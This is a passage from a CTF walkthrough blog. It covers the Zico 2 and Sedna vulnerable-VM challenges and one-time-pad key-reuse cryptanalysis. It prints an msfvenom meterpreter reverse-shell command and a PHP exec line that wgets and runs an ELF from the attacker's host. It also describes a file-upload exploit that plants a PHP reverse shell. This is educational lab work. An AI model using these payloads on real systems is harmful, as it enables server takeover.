CTF Solutions - the blog presents walkthroughs of Capture The Flag challenges. Author: rgolebiowski.<br />
<br />
<b>Zico 2 challenge</b> (2017-10-26)<br />
Hello all,<br />
<br />
Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?<br />
<br />
Let's try to verify it.<br />
<br />
First of all, let's scan our target.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOweCllyMxT430TOODq0C9JVlZhBXK5g8L8yFmBS7bPXX5eo8K-n1V63JvedLV6DHfYOKWaVfayYfA8CYfdGnLuxSLj_yjy_028JJ-hS3yKchqREHxR6L2SHlyFuG43KfyHRLN2Gxnnps/s1600/scan-port_top_100.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="887" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOweCllyMxT430TOODq0C9JVlZhBXK5g8L8yFmBS7bPXX5eo8K-n1V63JvedLV6DHfYOKWaVfayYfA8CYfdGnLuxSLj_yjy_028JJ-hS3yKchqREHxR6L2SHlyFuG43KfyHRLN2Gxnnps/s640/scan-port_top_100.png" width="640" /></a></div>
<br />
I scanned only the top 100 ports, because scanning all ports takes a lot of time.<br />
<br />
As always, let's begin the pentest with the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvcEnFULyynKb9syJhM4vjfTCcfaaKusyKw2IFtDGhkvKdmTtKLIeJaCPvAmE3LQqJuyYqNS5XgXBxRGT2ZPGud3IiIydA7WBMZ1Eifp_t50DR45_o94-xngimh0caj9bzFYQNZqAw4lg/s1600/web_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvcEnFULyynKb9syJhM4vjfTCcfaaKusyKw2IFtDGhkvKdmTtKLIeJaCPvAmE3LQqJuyYqNS5XgXBxRGT2ZPGud3IiIydA7WBMZ1Eifp_t50DR45_o94-xngimh0caj9bzFYQNZqAw4lg/s640/web_1.png" width="640" /></a></div>
<br />
OK, let's enumerate it using dirb.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM-fLvRQ2Hy_NNT84-uatFndOoJXB-EhyNtf1vMa9HMvnFeX8x2b_Kps0AUkbXKATVlwkT5KjOuQMPt3nVzmZx6CSNHreW8yrPxOeLO6-1iSTCLdI9PZTaT-n69nXj12CrXZXglxWF3ag/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="558" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM-fLvRQ2Hy_NNT84-uatFndOoJXB-EhyNtf1vMa9HMvnFeX8x2b_Kps0AUkbXKATVlwkT5KjOuQMPt3nVzmZx6CSNHreW8yrPxOeLO6-1iSTCLdI9PZTaT-n69nXj12CrXZXglxWF3ag/s400/dirb.png" width="400" /></a></div>
<br />
<b>/dbadmin/</b> looks very interesting... Let's look at it more closely.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgedusG1C26OhfHxW9hRqRNrvrLhTWNJaLvby93twJBZnaCOiWxpKxMsTj9e94PwQRWPKi_FEClixBrjrum165SieQ6HvxmjzenoH3X0m8xxOJ-SQAPmSNy-KCdnG1osyRRNGYSMynMPMg/s1600/web_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="290" data-original-width="506" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgedusG1C26OhfHxW9hRqRNrvrLhTWNJaLvby93twJBZnaCOiWxpKxMsTj9e94PwQRWPKi_FEClixBrjrum165SieQ6HvxmjzenoH3X0m8xxOJ-SQAPmSNy-KCdnG1osyRRNGYSMynMPMg/s320/web_2.png" width="320" /></a></div>
<br />
Let's click on <b>test_db.php</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggF2QaKDCyuP2ZCE4l29DidXSi540lemgr1rQPGGvlpjoig0bMxikYfgtMNasSc_u8X489FhaluSQIQP9KQWc-_yyfdlYB-PZBXQZkAlQVschJSCOSDM3MrLAJk5hyphenhyphenLPIh-to2Ia6DeeE/s1600/db.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="588" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggF2QaKDCyuP2ZCE4l29DidXSi540lemgr1rQPGGvlpjoig0bMxikYfgtMNasSc_u8X489FhaluSQIQP9KQWc-_yyfdlYB-PZBXQZkAlQVschJSCOSDM3MrLAJk5hyphenhyphenLPIh-to2Ia6DeeE/s320/db.png" width="320" /></a></div>
<br />
Hmmm, a password... We don't know any password. But we can see <b>phpLiteAdmin v1.9.3</b>, and as far as I know this version is vulnerable to PHP code injection.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zTbazczFF7-YZOnvGPWTiDwWDHKIuBrCfGj6yZivE3KAvTuyK-MGsqB8doR7BUuYISK-pk09NI_gp1bLd3oW1E1afiWOjDNBP96S6a0fqPui7MqvqQUKH5ThyS1r24l0XS-PbMcKYDo/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="542" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zTbazczFF7-YZOnvGPWTiDwWDHKIuBrCfGj6yZivE3KAvTuyK-MGsqB8doR7BUuYISK-pk09NI_gp1bLd3oW1E1afiWOjDNBP96S6a0fqPui7MqvqQUKH5ThyS1r24l0XS-PbMcKYDo/s320/exploit.png" width="320" /></a></div>
<br />
Excellent, let's also try to guess the password to the admin panel.<br />
Yes! <b>admin</b> is a valid password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41wVX0j_vhTVi5OKRGtppfdO3uLhPpw_qd0VohNe9zQuPWpnsLEivOyKVIxOC5DWUNwdxaQmeWZ8BHFxxwKgaaFhitlwWMhr2ONQ4Qk3F624EL54eqzIi56emXiWh4GFrkrrptjONxXY/s1600/panel.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="604" data-original-width="1323" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41wVX0j_vhTVi5OKRGtppfdO3uLhPpw_qd0VohNe9zQuPWpnsLEivOyKVIxOC5DWUNwdxaQmeWZ8BHFxxwKgaaFhitlwWMhr2ONQ4Qk3F624EL54eqzIi56emXiWh4GFrkrrptjONxXY/s320/panel.png" width="320" /></a></div>
<br />
Great! Now we can use our exploit.<br />
We have created a new database named <b>hack.php</b>.<br />
The database hack.php contains only one table with one record. The record is as follows: <b><?php phpinfo(); ?></b>. Now let's execute it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBclBrSb8Nc6bb1itzMk5txWmCr0pth1cEA5Q353RFakSvPajtE74UITAZmsbofLcHrxePl7j6dcXiOKP6Pi1F3gchWlROo3r9lT_l5mOiH7gKjHDSwbZLDPoR1TzRQII7zNxMayO3LRE/s1600/db1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="779" data-original-width="1321" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBclBrSb8Nc6bb1itzMk5txWmCr0pth1cEA5Q353RFakSvPajtE74UITAZmsbofLcHrxePl7j6dcXiOKP6Pi1F3gchWlROo3r9lT_l5mOiH7gKjHDSwbZLDPoR1TzRQII7zNxMayO3LRE/s320/db1.png" width="320" /></a></div>
<br />
Great! The PoC works. Now let's change the record from the PoC to a reverse shell.<br />
I tried to upload and execute a PHP reverse shell, but without success. So maybe let's try playing with an ELF file instead.<br />
We have to upload a PHP file first; that file will be responsible for <b>wget</b>-ing the ELF file onto the server, and then we will be able to execute the ELF file.<br />
<br />
Generated payload:<br />
<blockquote class="tr_bq">
msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=53 -f elf -o shell</blockquote>
Record in the table:<br />
<blockquote class="tr_bq">
<?php exec("cd /tmp; wget http://192.168.56.1/shell; chmod a+x shell; ./shell"); ?></blockquote>
<br />
So now we have to run the Metasploit meterpreter listener.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdW3cFx6QI3NxjNBIP8FFe_NMnUMfDgo2FjtlkiC6E9xLlPGOfTGRBw2gVWl93vVI6XLVbygDYXmMsfDWBVqlpW-JM9T9BWPqLOA0grtbquzQm8dKfxq0wASImf3pA5mfLWPGdKC-keVs/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="204" data-original-width="493" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdW3cFx6QI3NxjNBIP8FFe_NMnUMfDgo2FjtlkiC6E9xLlPGOfTGRBw2gVWl93vVI6XLVbygDYXmMsfDWBVqlpW-JM9T9BWPqLOA0grtbquzQm8dKfxq0wASImf3pA5mfLWPGdKC-keVs/s320/shell.png" width="320" /></a></div>
<br />
Excellent, we have got a limited shell.<br />
In the <b>/home/zico/wordpress</b> directory I found the wp-config.php file, which contains the DB password for the <b>zico</b> user. Let's try to use it to switch from the www-data user to the zico user.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAI-GxyqZfZudXvPIcXuPXRsbnEgCdJBbdYY_pOeCfCCkuuyIhxRVD1wlckeo_F_Xy7iVPJgusjH5FeYFVkIIplF7LMk1xhyphenhyphenw5EUdd2CNpB-p6NFmjCGSMJoGDCq9r67_sSpSfwSlZigM/s1600/zico.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="275" data-original-width="468" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAI-GxyqZfZudXvPIcXuPXRsbnEgCdJBbdYY_pOeCfCCkuuyIhxRVD1wlckeo_F_Xy7iVPJgusjH5FeYFVkIIplF7LMk1xhyphenhyphenw5EUdd2CNpB-p6NFmjCGSMJoGDCq9r67_sSpSfwSlZigM/s320/zico.png" width="320" /></a></div>
<br />
Nice.<br />
<br />
<b>Taking advantage of one-time pad key reuse</b> (2017-07-31)<br />
Hello,<br />
Today we will have the pleasure of playing with cryptanalysis of the One-Time Pad.<br />
<br />
We have the following scenario:<br />
Someone was using the same key for several different messages. We were able to capture these ciphertexts and we want to decrypt them.<br />
We know that the sender was very lazy and used the same key for every message.<br />
<br />
We know that:<br />
<b>c_i = m_i XOR k</b><br />
where:<br />
<b>c_i</b> - ciphertext<br />
<b>m_i</b> - message in plaintext<br />
<b>k</b> - key used to encrypt the messages (every time the same)<br />
<br />
Captured ciphertexts:<br />
<blockquote class="tr_bq">
<b>ciphertext #1:</b><br />
315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e<br />
<b>ciphertext #2:</b><br />
234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f<br />
<b>ciphertext #3:</b><br />
32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb<br />
<b>ciphertext #4:</b><br />
32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa<br />
<b>ciphertext #5:</b><br />
3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070<br />
<b>ciphertext #6:</b><br />
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4<br />
<b>ciphertext #7:</b><br />
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce<br />
<b>ciphertext #8:</b><br />
315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3<br />
<b>ciphertext #9:</b><br />
271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027<br />
<b>ciphertext #10:</b><br />
466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83</blockquote>
We know how XOR works, and we should exploit that knowledge:<br />
<blockquote class="tr_bq">
<b>c_i XOR c_j = m_i XOR m_j XOR k XOR k = m_i XOR m_j </b></blockquote>
So, if we guess some part of a message (for example message i), then we get the corresponding part of the plaintext of message j, because:<br />
<blockquote class="tr_bq">
<b>m_i XOR m_i XOR m_j = m_j</b></blockquote>
The most popular words and fragments in English are, for example: <b>The, he, ing</b>, etc.<br />
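The crib-dragging procedure just described, implemented as an added example (this is not the post's own script, which appears below only as screenshots): the three plaintexts and the random key are constructed here, the first plaintext being the post's recovered goal sentence. Everything the functions return depends only on m_i XOR m_j, so the key itself never matters.<br />

```python
from __future__ import annotations

import os

# Constructed demo plaintexts (not captured data); the first is the "goal"
# sentence that the post recovers at the end.
MESSAGES = [
    b"The secret message is: When using a stream cipher, never use the key more than once",
    b"The one-time pad is perfectly secret only if the key is never reused",
    b"Crib dragging works because the key cancels when two ciphertexts are XORed",
]
# A truly random pad as long as the longest message: key quality is not the
# problem here, reuse is.
KEY = os.urandom(max(len(m) for m in MESSAGES))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def otp_encrypt(key: bytes, m: bytes) -> bytes:
    """c_i = m_i XOR k, the scheme from the post."""
    return xor_bytes(key, m)


CIPHERTEXTS = [otp_encrypt(KEY, m) for m in MESSAGES]


def looks_like_text(frag: bytes) -> bool:
    """Cheap plausibility filter: printable ASCII only."""
    return all(0x20 <= b <= 0x7E for b in frag)


def crib_drag(c_i: bytes, c_j: bytes, crib: bytes) -> list[tuple[int, str]]:
    """Slide a guessed fragment (the crib) along c_i XOR c_j.

    Because c_i XOR c_j = m_i XOR m_j, XORing the crib in at offset p yields
    m_j[p:] when the crib really sits in m_i at p (and m_i[p:] when it sits
    in m_j).  Offsets whose output is printable are returned for a human to
    judge; a wrong offset usually produces control bytes or gibberish.
    """
    diff = xor_bytes(c_i, c_j)
    hits = []
    for p in range(len(diff) - len(crib) + 1):
        frag = xor_bytes(diff[p:p + len(crib)], crib)
        if looks_like_text(frag):
            hits.append((p, frag.decode("ascii")))
    return hits


def reveal_key(c_i: bytes, offset: int, crib: bytes) -> dict[int, int]:
    """Once a crib is believed to sit in message i at `offset`, those key
    bytes follow directly: k[p] = c_i[p] XOR m_i[p]."""
    return {offset + n: c_i[offset + n] ^ crib[n] for n in range(len(crib))}


def decrypt_partial(c: bytes, partial_key: dict[int, int]) -> str:
    """Apply the key bytes recovered so far; unknown positions print as '?'."""
    return "".join(chr(c[p] ^ partial_key[p]) if p in partial_key else "?"
                   for p in range(len(c)))


if __name__ == "__main__":
    crib = b"the key"
    for p, frag in crib_drag(CIPHERTEXTS[0], CIPHERTEXTS[1], crib):
        print(f"offset {p:3d}: {frag!r}")
    # The hit at offset 61 reads " reused", so the crib sits at 61 in one
    # message and " reused" in the other.  Which one?  Try both assignments
    # against a third ciphertext: only the correct one makes it readable too.
    for i in (0, 1):
        k = reveal_key(CIPHERTEXTS[i], 61, crib)
        print(f"assume crib in message {i}:", decrypt_partial(CIPHERTEXTS[2], k))
```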
Let's write a short script to decrypt the messages.<br />
<br />
First version of the script<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8rxseLU4ON1gEr654yaZ9_d-Xzx66Lu7rDGk923hOmj_pGzcWq80ZAmakKL5qF1LDs9Xj6AwaehzSj7wrAaReMM4ajNAOR49SNrNnQ_iDa-g6qXOin_xvMQMlkb72JmoP_4-mPqzgDE/s1600/coursera1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="515" data-original-width="799" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8rxseLU4ON1gEr654yaZ9_d-Xzx66Lu7rDGk923hOmj_pGzcWq80ZAmakKL5qF1LDs9Xj6AwaehzSj7wrAaReMM4ajNAOR49SNrNnQ_iDa-g6qXOin_xvMQMlkb72JmoP_4-mPqzgDE/s1600/coursera1.png" /></a></div>
<br />
The final code is shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibh873utB7RLZIfkbpMoK1hdWvjuoVRYVBu3LkPf5bT7ql0N3ieqa_JlQIIkgeXj2h3qD4xdS_QU6IyVP8-1vAGJ87ScBTaZ8WwLRJqnVYTx1NY6TXNUHaQsvWm_DdTwgJW5tuAOZZXU4/s1600/final.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="551" data-original-width="844" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibh873utB7RLZIfkbpMoK1hdWvjuoVRYVBu3LkPf5bT7ql0N3ieqa_JlQIIkgeXj2h3qD4xdS_QU6IyVP8-1vAGJ87ScBTaZ8WwLRJqnVYTx1NY6TXNUHaQsvWm_DdTwgJW5tuAOZZXU4/s1600/final.png" /></a></div>
<br />
Now we are able to guess each of the messages.<br />
<br />
Result:<br />
<blockquote class="tr_bq">
<b>Messages:</b><br />
m_1 = we can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times - Robert Harley<br />
m_2 = Euler would probably enjoy that now his theorem becomes a corner stone of crypto - Annonymous on Euler's theorem<br />
m_3 = The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh<br />
m_4 = The ciphertext produced by a weak encryption algorithm looks as good as ciphertext produced by a strong encryption algorithm - Philip Zimmermann<br />
m_5 = You don't want to buy a set of car keys from a guy who specializes in stealing cars - Marc Rotenberg commenting on Clipper<br />
m_6 = There are two types of cryptography - that which will keep secrets safe from your little sister, and that which will keep secrets safe from your government - Bruce Schneier<br />
m_7 = There are two types of cyptography: one that allows the Government to use brute force to break the code, and one that requires the Government to use brute force to break you<br />
m_8 = We can see the point where the chip is unhappy if a wrong bit is sent and consumes more power from the environment - Adi Shamir<br />
m_9 = A (private-key) encryption scheme states 3 algorithms, namely a procedure for generating keys, a procedure for encrypting, and a procedure for decrypting.?<br />
m_10 = The Concise OxfordDictionary (2006) defines crypto as the art of writing o r solving codes. <br />
goal = <b>The secret message is: When using a stream cipher, never use the key more than once</b></blockquote>
<b>OSWP</b> (2017-05-25)<br />
Hello guys,<br />
I would like to apologize that I didn't write any posts for a long time, but I have a very good excuse - I was working on my OSWP :-)<br />
<br />
<b>Sedna challenge</b> (2017-03-27)<br />
Hello,<br />
<br />
Today I want to show you a Sedna hackfest walkthrough.<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCVJ3uozeqTXmPjp0XW4RsYiC0COeJu5EAIu-FiWqgVhVMjQrw9SwUtalRIdk0qwMzez30eYH6-lDj9kIRFqUX0cNT7dt10rjFz-_Bg8VNoKN-c890kzxy8GMggJjXqW8UyDDG9gqzCSE/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCVJ3uozeqTXmPjp0XW4RsYiC0COeJu5EAIu-FiWqgVhVMjQrw9SwUtalRIdk0qwMzez30eYH6-lDj9kIRFqUX0cNT7dt10rjFz-_Bg8VNoKN-c890kzxy8GMggJjXqW8UyDDG9gqzCSE/s640/nmap.png" width="640" /></a></div>
<br />
There are a lot of open ports. I tried playing with Samba, but there is nothing interesting except the version, 4.6.1 (I didn't find a valid exploit for this version of Samba).<br />
I tried browsing port 8080, but to reach the manager panel I need valid web-based authentication credentials. Default credentials such as admin:admin and tomcat:tomcat don't work.<br />
<br />
So, I decided to browse port 80.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZuKwVz4X-jQSSxFvS9LXkFX_ViBrfOq6grfUvb3qSulsEPHoxgjtPX-GwENrGETx9ayMVFtrN462QLpBWWGWmElKGfKeCzZA-p5bqJZMY-VSNOT6_K_Mv6rZJhWTIqwICpFZ7UZ5L7IY/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZuKwVz4X-jQSSxFvS9LXkFX_ViBrfOq6grfUvb3qSulsEPHoxgjtPX-GwENrGETx9ayMVFtrN462QLpBWWGWmElKGfKeCzZA-p5bqJZMY-VSNOT6_K_Mv6rZJhWTIqwICpFZ7UZ5L7IY/s640/web.png" width="640" /></a></div>
<br />
OK, let's run DirBuster to find the web application's directory structure.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yE37uyavVdr64auTj1PEs9xsKZHq-PC3ugXgBCtH4cnwHvJo8r1K3YATZkKdgModr6J1g3cDcAHiafI6uEkfRXOltdog_t2J3ezRs5Y0L7LFfIGQLTl4XZicN_Q6BuNSAlnvWTy4l8Y/s1600/dirbu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yE37uyavVdr64auTj1PEs9xsKZHq-PC3ugXgBCtH4cnwHvJo8r1K3YATZkKdgModr6J1g3cDcAHiafI6uEkfRXOltdog_t2J3ezRs5Y0L7LFfIGQLTl4XZicN_Q6BuNSAlnvWTy4l8Y/s400/dirbu.png" width="400" /></a></div>
<br />
Hmmm, unfortunately I didn't find an entry point into the target.<br />
So, because I didn't have any better idea, I decided to run the nikto vulnerability scanner, and it found a <b>license.txt</b> file, which may be interesting...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEv-_vb3_ed7EFq_LpRtQUHXWyw843tkfJtwkMy4sdvU0i02nahR3cPRd_dudM6-s1FNO_qBSjAwNeHrIrovDe478Do61085Qf4Y9yvY2OLwHNXcgAtAvPA4ClTO7ZvKIK7nqAQmXam8/s1600/nito.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEv-_vb3_ed7EFq_LpRtQUHXWyw843tkfJtwkMy4sdvU0i02nahR3cPRd_dudM6-s1FNO_qBSjAwNeHrIrovDe478Do61085Qf4Y9yvY2OLwHNXcgAtAvPA4ClTO7ZvKIK7nqAQmXam8/s640/nito.png" width="640" /></a></div>
<br />
Opening /license.txt I found something juicy.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZcPR97qGRGk5-Yt8a5xxYSNB2NGOx9Wib6vEd_GYqWFtb5BTb-j6jcuuvCX-O4uIm3ry4mS3lGUNME3QGvlL_fT-QlO-eDxVgnGHeIcNcz06-ygTlqXkIyWvsYh4ch7PGCTtqdTqcB8/s1600/license.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZcPR97qGRGk5-Yt8a5xxYSNB2NGOx9Wib6vEd_GYqWFtb5BTb-j6jcuuvCX-O4uIm3ry4mS3lGUNME3QGvlL_fT-QlO-eDxVgnGHeIcNcz06-ygTlqXkIyWvsYh4ch7PGCTtqdTqcB8/s400/license.png" width="400" /></a></div>
<br />
This page tells us that the web application uses BuilderEngine. I looked for a valid exploit and BINGO!<br />
We are able to use "BuilderEngine 3.5.0 - Arbitrary File Upload".<br />
I opened the URL from the exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR7oLlOjweOH9EC1v0w7WGw2-5-9antgad0fkjAUgUYGtWjCusea8QvNBEq8rpMV19YFiVKWc94Qa83TDNfwgJnUViKytFDeDG-fIGpbWb_mBoc8VHDr9j50_tPPu4PvE5jQ0cnLuY-M/s1600/exp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR7oLlOjweOH9EC1v0w7WGw2-5-9antgad0fkjAUgUYGtWjCusea8QvNBEq8rpMV19YFiVKWc94Qa83TDNfwgJnUViKytFDeDG-fIGpbWb_mBoc8VHDr9j50_tPPu4PvE5jQ0cnLuY-M/s640/exp.png" width="640" /></a></div>
<br />
I created a new file named <b>exploit.html</b> which contains part of the content of our exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mTAT70In4s6xtx_76o2vrlKxIHnOTwbkHnTdEh7nRAmD1b6_KEU6mMYvdEEsXzEsuRUm_HggwzQON_IFASKzDdQ3TatMhBTtxXGas2qFH85xDbrcQ70d8_3oGTnus1SQC7a9SVn9lUQ/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mTAT70In4s6xtx_76o2vrlKxIHnOTwbkHnTdEh7nRAmD1b6_KEU6mMYvdEEsXzEsuRUm_HggwzQON_IFASKzDdQ3TatMhBTtxXGas2qFH85xDbrcQ70d8_3oGTnus1SQC7a9SVn9lUQ/s640/exploit.png" width="640" /></a></div>
<br />
I ran an Apache server and executed our exploit, uploading a PHP reverse shell file named shell.php.<br />
Now we have to find our backdoor.<br />
<div class="separator" style="clear: both; text-align: center;">
